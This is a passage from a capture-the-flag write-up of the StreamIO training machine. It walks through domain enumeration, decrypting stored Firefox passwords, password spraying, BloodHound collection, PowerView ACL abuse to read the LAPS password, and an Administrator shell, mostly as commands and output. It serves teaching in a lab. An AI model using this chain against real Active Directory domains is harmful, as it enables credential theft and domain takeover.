BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
ERROR: Unable to get user claims information.
PS C:\inetpub\streamio.htb\admin> net user /domain
net user /domain
User accounts for \\DC
-------------------------------------------------------------------------------
Administrator Guest JDgodd
krbtgt Martin nikk37
yoshihide
The command completed successfully.
PS C:\inetpub\streamio.htb\admin> net user nikk37 /domain
net user nikk37 /domain
User name nikk37
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 2:57:16 AM
Password expires Never
Password changeable 2/23/2022 2:57:16 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/22/2022 3:39:51 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
PS C:\inetpub\streamio.htb\admin> net user Martin /domain
net user Martin /domain
User name Martin
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2022 4:16:42 PM
Password expires Never
Password changeable 5/27/2022 4:16:42 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/22/2022 3:57:08 AM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
This means we should go for nikk37 and escalate privileges to Martin.
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ evil-winrm -i dc.streamio.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37
*Evil-WinRM* PS C:\Users\nikk37\Documents> ls
*Evil-WinRM* PS C:\Users\nikk37\Documents> ls ..\Desktop
Directory: C:\Users\nikk37\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/22/2022 3:57 AM 34 user.txt
*Evil-WinRM* PS C:\Users\nikk37\Documents> type ..\Desktop\user.txt
1996f9********************5cf276
And we finally got the user flag!! Let's proceed to escalate privileges.
In our local enumeration, while running winpeas (not included in the writeup), we found out Firefox is installed and the user nikk37 has a key4.db file which is where passwords could be stored. We will download it to our host and use firepwd to decrypt it:
C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db also need logins.json
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ mkdir firefox
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ ls firefox
key4.db logins.json
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ python3 /opt/firepwd/firepwd.py -d firefox
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
}
}
}
OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
}
}
}
OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
}
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
With these, we can test them with a user list from the ones found on the machine and test them:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ cat << EOF >> domain_users
heredoc> yoshihide
heredoc> Martin
heredoc> JDgodd
heredoc> nikk37
heredoc>
heredoc> EOF
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ cat << EOF >> firefox_passwd
heredoc> JDg0dd1s@d0p3cr3@t0r
heredoc> n1kk1sd0p3t00:)
heredoc> paddpadd@12
heredoc> password@12
heredoc>
heredoc> EOF
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ crackmapexec smb dc.streamio.htb -d streamio.htb -u domain_users -p firefox_passwd | grep -v "STATUS_LOGON_FAILURE"
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
if result['type'] is not 'searchResEntry':
SMB streamIO.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamio.htb) (signing:True) (SMBv1:False)
SMB streamIO.htb 445 DC [+] streamio.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
Found valid user/passwd pair: JDgodd:JDg0dd1s@d0p3cr3@t0r
Since we now can access another user that is not Martin, we should probably retrieve data for Bloodhound. In this case, we will use bloodhound-python.
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ bloodhound-python -d streamio.htb -u 'JDgodd' -p 'JDg0dd1s@d0p3cr3@t0r' -dc dc.streamio.htb -gc dc.streamio.htb -c all -ns 10.129.56.7
INFO: Found AD domain: streamio.htb
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 8 users
INFO: Connecting to GC LDAP server: dc.streamio.htb
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 28S
Found Principals with DCSync rights: makes sense as Martin is a Domain Admin
More importantly, JDGodd can read LAPS Password through the CORE STAFF group membership:
But this user is not a member of this group:
*Evil-WinRM* PS C:\Users\nikk37> net group
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*CORE STAFF
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\nikk37> net group 'CORE STAFF'
Group name CORE STAFF
Comment
Members
-------------------------------------------------------------------------------
The command completed successfully.
*Evil-WinRM* PS C:\Users\nikk37> net user JDGodd
User name JDgodd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 2:56:42 AM
Password expires Never
Password changeable 2/23/2022 2:56:42 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/26/2022 11:17:08 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
We need to add this user to the CORE STAFF group:
*Evil-WinRM* PS C:\Users\nikk37> [string]$userName = 'JDgodd'
*Evil-WinRM* PS C:\Users\nikk37> [string]$userPassword = 'JDg0dd1s@d0p3cr3@t0r'
*Evil-WinRM* PS C:\Users\nikk37> [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37> [pscredential]$PScred = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
*Evil-WinRM* PS C:\Users\nikk37> Add-ADGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credential $PScred
Insufficient access rights to perform the operation
At line:1 char:1
+ Add-ADGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credentia ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (CORE STAFF:ADGroup) [Add-ADGroupMember], ADException
+ FullyQualifiedErrorId : ActiveDirectoryServer:8344,Microsoft.ActiveDirectory.Management.Commands.AddADGroupMember
But we cannot until we make JDGodd owner of the group and apply the domain object ACLs. For this we will use Add-DomainObjectAcl from PowerView.
*Evil-WinRM* PS C:\Users\nikk37> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\nikk37> [string]$userName = 'streamIO.htb\JDgodd'
*Evil-WinRM* PS C:\Users\nikk37> [string]$userPassword = 'JDg0dd1s@d0p3cr3@t0r'
*Evil-WinRM* PS C:\Users\nikk37> [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37> [pscredential]$PScred = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
*Evil-WinRM* PS C:\Users\nikk37> Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Credential $PScred
*Evil-WinRM* PS C:\Users\nikk37> Add-DomainObjectAcl -TargetIdentity 'CORE STAFF' -PrincipalIdentity 'JDgodd' -Crede
ntial $PScred -Rights All
*Evil-WinRM* PS C:\Users\nikk37> Add-ADGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credential $PScred
*Evil-WinRM* PS C:\Users\nikk37> net group 'CORE STAFF'
Group name CORE STAFF
Comment
Members
-------------------------------------------------------------------------------
JDgodd
The command completed successfully.
Reading LAPS:
*Evil-WinRM* PS C:\Users\nikk37> Get-DomainObject -Identity $Computers.name -Credential $PScred | Format-Table -Auto
Size Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
name dnshostname ms-mcs-admpwd ms-mcs-admpwdexpirationtime
---- ----------- ------------- ---------------------------
DC DC.streamIO.htb %2jiK&+{8q8+%l 133084042097011826
DC
Accessing the system as Administrator:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ evil-winrm -i dc.streamio.htb -u 'Administrator' -p '%2jiK&+{8q8+%l'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path C:\Users -Recurse -Filter 'root.txt'
Directory: C:\Users\Martin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/22/2022 3:57 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Martin\Desktop\root.txt
836130********************c97a6c
And we got the root flag!!
Given what we have, we tried to do some injection on . It is a Time-based SQLi that takes hours to run. Some data was retrieved but not completely. One thing to point out is that through our enumeration for SQLi, we determined this machine is using SQL Server which is important to know.
Through
